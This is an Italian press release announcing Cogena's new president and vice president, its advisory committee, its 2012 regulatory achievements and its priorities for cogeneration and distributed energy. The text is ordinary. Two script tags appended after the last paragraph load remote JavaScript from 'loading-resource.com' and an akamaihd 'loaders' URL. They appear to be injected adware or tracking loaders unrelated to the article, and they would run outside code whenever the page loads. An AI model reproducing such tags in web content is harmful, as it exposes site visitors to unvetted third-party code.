Con le recenti elezioni dell’Unione Cogena si completa la “Squadra Energia” della Federazione Ascomac.
Eletti Presidente l’Ing. Corsini e Vice Presidente il Sig. Cavagnera, entrambi con una profonda e pluriennale esperienza in tema di cogenerazione e di efficienza energetica nei diversi settori di applicazione: industriale, terziario, residenziale e agricolo.
"L’efficienza energetica e la generazione distribuita programmabile - sostiene l’Ing. Corsini - devono essere obiettivi prioritari per l’Italia e per l’Europa, come peraltro evidenziato nella direttiva 2012/27/UE. La spinta ad un utilizzo sempre più diffuso della cogenerazione, sia nell’industria che nel terziario e residenziale - ha evidenziato l’Ing. Corsini - è un’arma formidabile per il raggiungimento di questi obiettivi."
E’ stato altresì costituito il Comitato consultivo Cogena con l’obiettivo di supportare le decisioni del Presidente e del Vice Presidente nei diversi settori rappresentati dalla efficienza energetica, dalla generazione distribuita di energia da fonti rinnovabili e da cogenerazione e dalle reti energetiche.
Del Comitato, insieme con l’Ing. Corsini ed il Sig. Cavagnera, fanno parte il Sig. Roberto Loschi di CPL CONCORDIA Soc. Coop. l’Ing. Fabio Fontana, l’Ing. Daniele di Franco della MTU Italia Srl e il Sig. Nicola Tessari di TESSARI ENERGIA SpA.
"Cogena, in questo momento di incertezza, è la nostra voce più “forte”. Rappresenta oltre 50 aziende che fanno della Generazione di Energia Distribuita il proprio business - commenta Giorgio Cavagnera, Presidente di DSFGROUP e Amministratore Unico di Spark Energy. Questo è il momento di strutturare il lavoro, di eliminare le inadeguatezze del nostro sistema giuridico, di proporre a gran voce le nostre soluzioni. Vorrei vivere l’associazione con valenza prevalentemente operativa, condividere tavoli di lavoro con colleghi e professionisti per sviluppare e affrontare con successo le tematiche specifiche ed i nodi tecnici che caratterizzano questo settore”.
Obiettivi raggiunti da COGENA nel 2012
1) Richiesta ed ottenuta la applicazione della aliquota di accisa per la produzione di energia elettrica all’intera quantità di combustibile utilizzato dal cogeneratore (ora solo in quota parte) ai sensi dell’Art. 3 bis L. n. 44/2012
2) Inserimento, nella Riforma del condominio della cogenerazione e degli impianti alimentati da fonti rinnovabili
3) Rimozione della situazione di discriminazione e lesione della concorrenza tra reti elettriche a causa della applicazione alle reti elettriche private di corrispettivi ed oneri non dovuti segnalata dalla AGCM Autorità garante della concorrenza e del mercato inviata al Governo ed al Parlamento - Provvedimento AS 898 del dicembre 2011. (L’AGCM ha ritenuto fondata la Segnalazione Ascomac Cogena del 21.4.2011 di discriminazione, nell’ambito dei sistemi di distribuzione chiusi, delle reti elettriche private operata dal D.Lgs. n. 93/2011 di recepimento della Direttiva 2009/72/CE).
Le priorità
- rafforzare il “sistema impresa” tra gli associati
- armonizzare il quadro normativo di riferimento, sviluppando e rafforzando l’efficienza energetica, la generazione distribuita di energia e le reti energetiche tra cui le RIU, i SEU, gli SDC) in termini di semplificazione amministrativa, accesso alla rete, regimi di aiuto all’investimento e sostegno all’esercizio, fiscalità energetica
- sviluppare una cultura della Efficienza energetica e della Generazione Distribuita di energia
- valorizzare le sinergie comuni con le altre associazioni
- esportare il know-how e la qualità delle aziende italiane verso mercati internazionali.
<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>